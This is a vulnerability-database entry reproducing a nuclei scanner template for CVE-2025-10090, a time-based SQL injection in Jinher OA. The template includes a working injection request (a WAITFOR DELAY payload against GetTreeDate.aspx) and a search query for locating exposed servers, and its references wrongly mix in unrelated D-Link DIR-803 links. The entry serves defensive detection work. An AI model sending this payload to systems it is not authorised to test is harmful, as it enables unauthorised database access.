Lucene search
K

Jinher OA - SQL Injection

🗓️ 05 Jul 2026 03:01:21Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 20 Views

Jinher OA SQL injection allows remote SQL execution, risking data theft; update to latest version.

Related
Refs
Code
ReporterTitlePublishedViews
Family
Circl
CVE-2025-10090
8 Sep 202513:20
circl
Circl
CVE-2025-14528
11 Dec 202517:39
circl
CNNVD
Jinher OA SQL注入漏洞
8 Sep 202500:00
cnnvd
CNNVD
D-Link DIR-803 安全漏洞
11 Dec 202500:00
cnnvd
CNVD
D-Link DIR-803 Information Disclosure Vulnerability
18 Dec 202500:00
cnvd
CVE
CVE-2025-10090
8 Sep 202509:32
cve
CVE
CVE-2025-14528
11 Dec 202517:02
cve
Cvelist
CVE-2025-10090 Jinher OA GetTreeDate.aspx sql injection
8 Sep 202509:32
cvelist
Cvelist
CVE-2025-14528 D-Link DIR-803 Configuration getcfg.php information disclosure
11 Dec 202517:02
cvelist
EUVD
EUVD-2025-202757
11 Dec 202517:02
euvd
Rows per page
id: CVE-2025-10090

info:
  name: Jinher OA - SQL Injection
  author: DhiyaneshDk
  severity: high
  description: |
    jinher jinher_oa is an office automation software that facilitates workflow management and collaboration within organizations. It sits in the enterprise layer of the tech stack, is typically deployed as self_hosted, and—within the information_technology industry—serves the business_apps domain.
  impact: |
    Remote attackers can execute arbitrary SQL commands, potentially leading to data theft or database compromise.
  remediation: |
    Update to the latest version.
  reference:
    - https://github.com/Madgeaaaaa/MY_VULN_2/blob/main/D-Link/vuln-2/DIR-803%20Authentication%20Bypass.md
    - https://vuldb.com/?id.335869
    - https://nvd.nist.gov/vuln/detail/CVE-2025-14528
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L
    cvss-score: 7.3
    cve-id: CVE-2025-10090
    epss-score: 0.01664
    epss-percentile: 0.73869
    cwe-id: CWE-74,CWE-89
  metadata:
    max-request: 1
    verified: true
    vendor: jinher
    fofa-query: app="金和网络-金和OA"||body="/jc6/platform/sys/login"
  tags: cve,cve2025,time-based,sqli,jc6,jinher,vkev

http:
  - raw:
      - |
        @timeout 10s
        GET /C6/Jhsoft.Web.departments/GetTreeDate.aspx/?id=1;WAITFOR+DELAY+'0:0:6'-- HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - 'duration>=6'
          - 'status_code == 200'
          - 'contains(content_type, "application/json")'
          - 'contains_all(body, "id", "permissions")'
        condition: and
# digest: 4a0a00473045022100c130f7dcd45a15782e712d4cdc7f2b6c08f5c742f95861bba1bb2c2c1ab0db0502203aa233f22f5a41516eb44bbd27a0adc89dfd8bfe43353ceb2370995a80867201:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

10 Feb 2026 14:14Current
6.5Medium risk
Vulners AI Score6.5
CVSS 3.17.3 - 9.8
CVSS 46.9
CVSS 27.5
CVSS 37.3
EPSS0.03559
SSVC
20